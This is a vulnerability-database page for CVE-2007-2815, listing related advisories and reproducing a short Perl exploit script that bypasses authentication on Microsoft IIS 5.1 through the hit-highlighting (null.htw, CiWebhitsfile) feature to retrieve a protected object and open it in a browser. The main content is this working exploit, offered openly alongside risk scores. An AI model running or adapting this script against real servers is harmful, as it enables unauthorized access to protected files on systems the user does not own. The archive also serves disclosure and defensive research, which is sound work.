CVE-2007-2815.txt

🗓️ 06 Jun 2007 00:00:00Reported by ff0000Type

packetstorm🔗 packetstormsecurity.com👁 62 Views

CVE-2007-2815 Perl script LWP module RC

Reporter	Title	Published	Views	Family All 11
0day.today	Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit	31 May 200700:00	–	zdt
Check Point Advisories	Microsoft IIS WebHits Authentication Bypass - Ver2 (CVE-2007-2815)	3 Mar 201400:00	–	checkpoint_advisories
CVE	CVE-2007-2815	22 May 200719:00	–	cve
Cvelist	CVE-2007-2815	22 May 200719:00	–	cvelist
Exploit DB	Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass	31 May 200700:00	–	exploitdb
exploitpack	Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass	31 May 200700:00	–	exploitpack
Tenable Nessus	Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass	25 Mar 200800:00	–	nessus
NVD	CVE-2007-2815	22 May 200719:30	–	nvd
Prion	Authentication flaw	22 May 200719:30	–	prion
seebug.org	Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit	1 Jul 201400:00	–	seebug

`#######################  
# CVE-2007-2815  
# ff0000  
# [email protected]  
# 01/06/2007  
#######################  
#! /usr/bin/perl  
use LWP 5.64;  
require "getopt.pl";  
&Getopt('shop');  
$browser = LWP::UserAgent->new;  
$proto=$opt_s;if($opt_s){$proto="https";}else{$proto="http";}  
$host=$opt_h;if(!$opt_h){&usage();}  
$obj =$opt_o;if(!$opt_o){&usage();}  
$port=$opt_p;if(!$opt_p){$port=80;}  
$url = "$proto://$host:$port/b00/null.htw?CiWebhitsfile=$obj&CiRestriction=b&CiHiliteType=full";  
$command = "c:\\Program Files\\Mozilla Firefox\\firefox.exe";  
$response = $browser->get($url);  
$browser->timeout(10);  
if($response->is_success){`"$command" "$url"`;}  
else{print "\n[!] Unable to connect to $host on port $port.\n";}  
sub usage{print "$0 <-h hostname | ip address> <-o protected object> [-p port] [-ssl] ";exit;}  
  
=  
`

06 Jun 2007 00:00Current

6.5Medium risk

Vulners AI Score6.5

EPSS0.85872